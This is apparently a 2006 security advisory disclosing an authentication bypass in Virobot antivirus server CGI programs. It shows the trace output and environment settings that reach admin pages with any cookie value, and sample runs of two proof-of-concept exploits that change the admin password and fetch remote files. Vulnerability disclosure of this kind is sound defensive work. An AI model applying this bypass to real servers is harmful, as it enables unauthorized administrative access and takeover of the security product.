======================================== INetCop Security Advisory #2006-0x82-028 ======================================== * Title: Global Hauri Virobot cookie exploit 0x01. Description Virobot Unix/Linux Server is anti virus program that develop in Global Hauri. (Product in Unix of SUN Sparc, HP, IBM base and RedHat Linux.) So that user examines and treats server's virus first, should login connect to Virobot exclusive use web server. Web server is being based on apache, i provide web service through CGI programs that is embodied inside. Problem of relevant product happens by many common gateway interface web program that don't confirm user state through produced cookie. This is fatal authentication vulnerability, and as a result, malicious hacker can acquire user id and password, and server use is possible without login. test: -- [root@Intel-x86-platform cgi-bin]# pwd /usr/local/ViRobot/cgi-bin [root@Intel-x86-platform cgi-bin]# ./filescan Content-type:text/html You need to authenticate. [root@Intel-x86-platform cgi-bin]# [root@Intel-x86-platform cgi-bin]# ltrace ./filescan __libc_start_main(0x08048c20, 1, 0xbffffbe4, 0x080488b4, 0x0804c3cc __register_frame_info(0x0804f010, 0x0804f188, 0xbffffba4, 0x080488d9, 0x4010748c) = 0x40107fc0 printf("Content-type:text/html\n\n") = 24 ... getenv("REMOTE_ADDR") = NULL memset(0xbffff729, '\000', 511) = 0xbffff729 memset(0xbffff6e9, '\000', 63) = 0xbffff6e9 uname(0xbfffd558) = 0 gethostbyname("Intel-x86-platform") = 0x40109f04 inet_ntoa(0x0100007f) = "" strncpy(0xbfffd4d8, "", 127) = 0xbfffd4d8 getenv("HTTP_COOKIE") = NULL // HTTP_COOKIE variable value need. atoi(0x0804c4f6, 0x0804c4f6, 0, 0xbffffb5c, 0x0804bf1a) = 3 strcmp("#COM-0003;", "#FSC-0003;") = -3 strcmp("#COM-0003;", "#COM-0003;") = 0 printf("%s\n", "You need to authenticate.") = 46 exit(1) = __deregister_frame_info(0x0804f010, 0xbffffb48, 0x0804c3e1, 0x4010748c, 0xbffffb5c) = 0x0804f188 +++ exited (status 1) +++ [root@Intel-x86-platform cgi-bin]# [root@Intel-x86-platform cgi-bin]# export HTTP_COOKIE=test // HTTP_COOKIE variable value establishment. [root@Intel-x86-platform cgi-bin]# ltrace ./filescan ... getenv("REMOTE_ADDR") = NULL memset(0xbffff709, '\000', 511) = 0xbffff709 memset(0xbffff6c9, '\000', 63) = 0xbffff6c9 uname(0xbfffd538) = 0 gethostbyname("Intel-x86-platform") = 0x40109f04 inet_ntoa(0x0100007f) = "" strncpy(0xbfffd4b8, "", 127) = 0xbfffd4b8 getenv("HTTP_COOKIE") = "test" getenv("HTTP_COOKIE") = "test" strncmp("test", "ViRobot_ID", 10) = 30 strncmp("test", "ViRobot_PASS", 10) = 30 // Can know that ViRbot_ID and ViRobot_PASS are used by Cookie value. ... ... // It's executed continuously though cookie value differs. ... getenv("REQUEST_METHOD") = NULL // REQUEST_METHOD variable value need. strcmp(NULL, "POST" --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ [root@Intel-x86-platform cgi-bin]# [root@Intel-x86-platform cgi-bin]# export REQUEST_METHOD=GET // REQUEST_METHOD variable value establishment. [root@Intel-x86-platform cgi-bin]# ./filescan | more Content-type:text/html ViRobot Linux Server Ver 2.0 ... [root@Intel-x86-platform cgi-bin]# With upside, result that require unrelated cookie value, I could get easily screen information that administrator utilizes after login. -- 0x02. Vulnerable Packages Vendor site: Global HAURI Inc. - http://www.globalhauri.com/ (US & Canada) HAURI ASIA Pte Ltd. - http://www.hauri.com.sg/ (Singapore) HAURI JAPAN Inc. - http://www.hauri.co.jp/ (Japan) China Blue Star Hauri Technology Co., Ltd. - http://www.hauri.com.cn/ (China) HAURI Latinoamerica S.A. - http://www.haurilatin.com/ (Latin/Mexico) Hauri do Brazil - http://www.haurilatin.com/ (Latin/Brazil) Hauri Europe GmbH - http://www.hauri-europe.com/ (Europe) HAURI Inc. - http://www.hauri.co.kr/ (Korea) Virobot Linux Server -eng-linux_i386-eval-20050817.tar +Turbo 6x/7x, Laser 5/6x/7x, Miracle 2x, Redhat 6x/7x Virobot Unix Server Disclosure Timeline: 2003-08.??: Vulnerabilities found. 2003-08.??: 1st vendor contact. (didn't responded) 2005-09.30: 2nd vendor contact. (didn't responded) 2005-10.03: 3rd vendor contact. (didn't responded) 2005-10.08: Deleted free download page in vendor (Ooops). 2006-02.17: 4th verdon contact. (didn't responded) 2006-02.22: Public disclosure. 0x03. Exploit We have two `Proof Of Concept' codes about bugs. #1. Virobot web administrator password change exploit: -- [root@Intel-x86-platform virobot]# head 0x82-viropass.c /* ** ** 0x82-viropass - Virobot password change exploit (ver2003) ** ** Our INetCop Security Team found this bug for the first time in 2003. ** At that time, vender Global Hauri was no any reaction. ** ** Announce unfortunately now.. (This bug that sleep during 2 years) ** ** exploit result: [root@Intel-x86-platform virobot]# [root@Intel-x86-platform virobot]# ./0x82-viropass localhost 8080 x82 hax0r 0x82-viropass - Virobot password change exploit (ver2003) ********************************************************* ** This exploit code is may change your virobot server ** ** administrator id and password. ** ********************************************************* [1] Set socket. [2] Send code. [*] Ok, modify admin information. (id: x82, passwd: hax0r) [*] exploit successfully. [*] Antivirus lose! [root@Intel-x86-platform virobot]# -- #2. Virobot remote directory file access exploit: -- [root@Intel-x86-platform virobot]# head 0x82-virofuk.c /* ** ** Virobot cookie bug remote exploit (v0.2) [Proof of Concept] ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), . ** My World: http://x82.inetcop.org ** */ [root@Intel-x86-platform virobot]# [root@Intel-x86-platform virobot]# ./0x82-virofuk localhost 8080 Virobot cookie bug remote exploit [Proof of Concept] [1] Set socket. [2] Send code. [3] Take and is storing substance. [*] Save file name: result.htm [*] Please wait for a moment ... [OK] [*] Read result.htm file contents. [root@Intel-x86-platform virobot]# ls result.htm result.htm [root@Intel-x86-platform virobot]# -- Hacker can attempt remote attack through this fatal problems. 0x04. Patch Problem happens by all CGI programs that can use without cookie information value. So that can inspect cookie value that user always has must add examining function or, module. Formally, before patch comes out, using firewall or iptables by temporary expedient, can establish so that can connect administrator's IP for relevant Web page. -- Thank you. P.S: Sorry, for my poor english. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org My World: http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y -- -- _______________________________________________ Get your free email from http://www.hackermail.com